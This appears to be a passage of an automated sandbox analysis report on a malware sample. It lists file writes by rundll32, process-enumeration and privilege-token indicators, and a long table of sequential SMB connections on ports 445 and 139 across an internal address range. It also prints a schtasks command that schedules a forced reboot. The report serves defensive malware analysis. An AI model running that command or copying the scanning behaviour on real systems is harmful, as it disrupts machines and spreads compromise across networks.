| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju | C:\Windows\SysWOW64\rundll32.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\E659.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
C:\Users\Admin\AppData\Local\Temp\E659.tmp
"C:\Users\Admin\AppData\Local\Temp\E659.tmp" \\.\pipe\{AC49C51E-66E5-48DC-B6A9-6350A75469BA}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3824 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3708 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| NL | 154.61.71.13:445 | tcp | |
| US | 13.107.253.64:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 13.107.253.64:139 | tcp | |
| NL | 154.61.71.13:139 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| N/A | 10.127.0.2:445 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| N/A | 10.127.0.5:445 | tcp | |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| N/A | 10.127.0.22:445 | tcp | |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| US | 104.208.16.95:445 | self.events.data.microsoft.com | tcp |
| GB | 142.250.179.234:445 | chromewebstore.googleapis.com | tcp |
| US | 13.107.42.16:445 | config.edge.skype.com | tcp |
| N/A | 10.127.0.50:445 | tcp | |
| US | 13.107.42.16:139 | config.edge.skype.com | tcp |
| GB | 142.250.179.234:139 | chromewebstore.googleapis.com | tcp |
| US | 104.208.16.95:139 | self.events.data.microsoft.com | tcp |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.68:445 | tcp | |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.75:139 | tcp | |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.87:139 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.88:139 | tcp | |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.92:139 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.101:139 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.116:139 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.128:139 | tcp | |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.135:445 | tcp | |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.140:139 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.141:139 | tcp | |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
